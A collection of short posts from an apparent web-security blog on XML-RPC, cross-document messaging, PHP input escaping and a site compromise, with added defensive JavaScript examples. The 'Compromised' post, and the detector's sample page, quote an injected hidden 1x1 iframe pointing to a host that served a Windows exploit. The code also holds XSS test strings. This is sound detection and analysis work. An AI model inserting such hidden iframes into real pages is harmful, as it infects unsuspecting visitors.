One Interface, Please

To deal with the increasing number of compromised blogs, WordPress 2.6 will turn off XML-RPC and AtomPUB interfaces by default.
MarsEdit developer Daniel Jalkut points out that the WordPress developers are ignoring the root cause:
If your web service only provides one, first-class API through which all access flows, then you’ve only got one point to secure, [...]

Can you trust document.location?

Maybe JavaScript needs a same-origin rule for document.location. [ via Simon Willison ]

I thought “know your customer” meant…

Via Cynthia, here’s a case of how “know your customer” laws and a bank’s indifference can derail a small business.
Blue Moon Fiber Arts, a small West Coast company, runs a ‘sock club’ service: a yarn-of-the-month club for knitters who want to work with cool, speciality yarns. The sock club grew popular. And [...]

Cross Talk

Yesterday, Douglas Crockford made a proposal for a cross-document scripting model; however, there’s already one in the WHAT WG working draft.
I’ve been reading both specifications. My notes below.
Cross Document Messages
In the WHAT WG model, documents can implement postMessage().
A receiving document (in another window or iframe) receives a message event, and will need to implement a [...]
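An added example of the receiving side described above, written for this page rather than taken from the WHAT WG draft or Crockford's proposal. It uses the property names the API later shipped with (`event.origin`, `event.data`, `event.source`), which may not match the 2006 draft's wording; the origins `https://widgets.example` and `https://host.example` are placeholders. The validation is a pure function so it can be exercised outside a browser with constructed events:

```javascript
// Added example (not from the original post or the WHAT WG draft): a receiving
// document's message handler that accepts cross-document messages only from a
// known origin and treats the payload as data, never as code.
const TRUSTED_ORIGIN = 'https://widgets.example'; // assumption: the frame we embed

// Validate and parse one message event. Returns the accepted command, or null
// when the message must be ignored. Pure, so it runs under Node as well.
function acceptMessage(event, trustedOrigin = TRUSTED_ORIGIN) {
  // 1. Origin check: the browser fills in event.origin; a sender cannot forge it.
  if (event.origin !== trustedOrigin) return null;
  // 2. Parse, don't eval: the payload is untrusted text even from a trusted origin.
  if (typeof event.data !== 'string') return null;
  let msg;
  try { msg = JSON.parse(event.data); } catch (e) { return null; }
  // 3. Whitelist the schema and clamp values before they touch the DOM.
  if (!msg || typeof msg !== 'object') return null;
  if (msg.type !== 'resize') return null;
  const height = Number(msg.height);
  if (!Number.isInteger(height) || height < 0 || height > 4000) return null;
  return { type: 'resize', height };
}

// Sender side: name the target origin instead of '*', so the browser drops the
// message if the target window has meanwhile navigated somewhere else.
function sendResize(targetWindow, height, targetOrigin = 'https://host.example') {
  targetWindow.postMessage(JSON.stringify({ type: 'resize', height }), targetOrigin);
}

// Installing the receiver in a browser (guarded so this file also runs under Node).
if (typeof window !== 'undefined') {
  window.addEventListener('message', (event) => {
    const msg = acceptMessage(event);
    if (msg) document.getElementById('widget').style.height = msg.height + 'px';
  });
}

// Constructed events standing in for what the browser would deliver.
const fromWidget = { origin: 'https://widgets.example', data: '{"type":"resize","height":300}' };
const fromAttacker = { origin: 'https://evil.example', data: '{"type":"resize","height":300}' };
const notJson = { origin: 'https://widgets.example', data: 'alert(1)' };
```

The origin check is the whole point of the model: without it any page that can obtain a reference to your window (an opener, an embedder) can feed your handler whatever it likes.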

Drive Slagging

[ via Bill Bumgarner ] Given the current Federal passion for grabbing every trace of data we generate, I predict making a HDD unreadable will become a crime.

An update of the old spying joke.

Bruce Schneier: The NSA would like to remind everyone to call their mother’s [phone] this Sunday. They need to calibrate their system.

Camille Paglia’s not a Security Expert

Adam, I don’t disagree that Apple might be bragging, but do you have to use the “she was asking for it” analogy?
Neither kinky boots, nor security boasts excuse assault.

A UI WTF moment

Checking on the status of a claim at my health insurer’s website, I tried signing in and got this helpful message:

At least it’s one less thing I need to remember.

The content-addressable internet

Brad Fitzpatrick endorses naming patches/installers with their digest value so you can search for patch “55820ee2f8c767a2833b21bd365e5753f50bd8ce”, download the file, compute the digest, and confirm you have the right file.

Terror in the Knitting Skies

Cynthia passed along the Yarn Harlot’s airplane misadventure: a businessman seated next to her decided her knitting needles were a threat (even though Transportation Security Administration rules allow them onboard.)

Check the serial numbers instead.

Adam: It’s easier to check ID than it is to make a judgment call. The consequences are illustrated by a scene from a popular film.

Untainting in PHP

Chris Shiflett posted the slides from a recent talk on PHP security. He set up three security challenges (see the source files.)
He showed off something I had not noticed before: htmlentities() takes a character-set argument (its third parameter), so you can declare the encoding the input is in rather than leaving it to the default.
Shiflett has a straightforward approach to untainting user input:

$html = array(); /* escaped copies live here; raw $_GET values are never echoed */

$html['variable'] = htmlentities($_GET['variable'], ENT_QUOTES, "utf-8");

/* Code using $html */

You could leverage [...]
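The same untainting discipline, as an added example in JavaScript rather than Shiflett's PHP: raw request values stay in one object, everything bound for an HTML context is escaped once into a separate frozen object, and only that object's values are ever concatenated into markup. Escaping follows ENT_QUOTES (both quote characters escaped). JavaScript strings are UTF-16, so there is no charset parameter to get wrong; the analogue of an invalid byte sequence is an unpaired surrogate, for which the function returns an empty string as htmlentities() does by default for malformed input. The request object is constructed:

```javascript
// Added example (not Chris Shiflett's code): his untainting pattern in JavaScript.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };

// A lone surrogate code unit is the UTF-16 equivalent of a malformed byte sequence.
function hasLoneSurrogate(s) {
  for (let i = 0; i < s.length; i++) {
    const cp = s.codePointAt(i);
    if (cp >= 0xD800 && cp <= 0xDFFF) return true; // unpaired half
    if (cp > 0xFFFF) i++;                           // valid pair: skip its low half
  }
  return false;
}

// Mirrors htmlentities($s, ENT_QUOTES, 'utf-8'): malformed input yields ''
// instead of passing through.
function htmlEscape(value) {
  const s = String(value);
  if (hasLoneSurrogate(s)) return '';
  return s.replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Escape every field of a request-parameter object into a new, frozen object,
// so later code cannot accidentally stash a raw value in it.
function untaint(raw) {
  const html = {};
  for (const [key, value] of Object.entries(raw)) html[key] = htmlEscape(value);
  return Object.freeze(html);
}

// Constructed request parameters, as a query-string parser would hand them over.
const raw = { variable: '<script>alert("x")</script>', name: "O'Brien" };
const html = untaint(raw);

// Templates use html.* only; raw.* never reaches markup.
function renderPage() {
  return `<p title="${html.name}">${html.variable}</p>`;
}
```

Escaping at the boundary into a separately named container is what makes a later review tractable: any `raw.` reference in a template is a bug you can grep for.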

More Development Links

Dori Smith reminds us there’s a shiny Easter Egg in her Serenity Dashboard Widget.
Chris Shiflett finished his book on PHP security for O’Reilly. I’m getting a copy and so are the rest of my team.
Ryan Campbell wrote a short piece on how to degrade Ajax so your site still works with JavaScript turned off.
The list [...]

DNS Poisoning, Click Farming, and Poorly Specified Contracts

An analysis of the recent DNS poisoning attacks [ via meuon ] finds that the attackers’ motivation was gaming a pay-per-click search engine.
A couple of days ago, a coworker asked me if I’ve been able to apply any of my economics training in my current profession.
Well, for one thing, I could have told you that [...]

Compromised

Tonight, when running a validation check, I discovered the following snippet inserted at the end of the page.
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div></body>
The hidden iframe loads a Windows exploit.
I have removed it, for the time being.
I don’t know how long it’s been [...]
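An added check for catching this kind of injection sooner than a validation run, not code from the post. It scans the HTML a server actually sends for iframes that point at a host you do not embed from, are 1x1, or sit inside a hidden container. Run it over the live response (the injection here was appended to the rendered page, so the template on disk would look clean). The allowed host list and the sample page are constructed; the injected snippet in the sample is the one quoted above:

```javascript
// Added example (not from the original post): flag suspicious iframes in
// served HTML. Regex-based on purpose so it runs with no DOM and no dependencies.
const OWN_HOSTS = new Set(['example.com', 'www.example.com']); // assumption: hosts you embed from

const IFRAME_RE = /<iframe\b([^>]*)>/gi;
const ATTR_RE = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;

function parseAttrs(attrText) {
  const attrs = {};
  for (const m of attrText.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

function hostOf(src) {
  try { return new URL(src, 'https://example.com/').hostname; } catch (e) { return null; }
}

// Returns one finding per iframe that trips any rule, with the reasons.
function findSuspiciousIframes(html, ownHosts = OWN_HOSTS) {
  const findings = [];
  for (const m of html.matchAll(IFRAME_RE)) {
    const attrs = parseAttrs(m[1]);
    const reasons = [];
    const host = attrs.src ? hostOf(attrs.src) : null;
    if (host && !ownHosts.has(host)) reasons.push('third-party host ' + host);
    const w = parseInt(attrs.width, 10);
    const h = parseInt(attrs.height, 10);
    if ((!isNaN(w) && w <= 1) || (!isNaN(h) && h <= 1)) reasons.push('tiny frame ' + w + 'x' + h);
    // Look a little way back for a hiding container such as the <div> above.
    const context = html.slice(Math.max(0, m.index - 300), m.index).toLowerCase();
    if (/visibility:\s*hidden|display:\s*none/.test(context)) reasons.push('inside hidden container');
    if (reasons.length) findings.push({ src: attrs.src, host, reasons });
  }
  return findings;
}

// Constructed page: one legitimate embed, plus the injected snippet quoted above.
const SAMPLE_PAGE = `<html><body><p>Hello</p>
<iframe src="https://www.example.com/map" width="400" height="300"></iframe>
<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://re6.net/?s=1" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div></body></html>`;
```

A cron job that fetches the front page and fails on any finding is a cheap tripwire; the same idea extends to unexpected `<script src>` hosts.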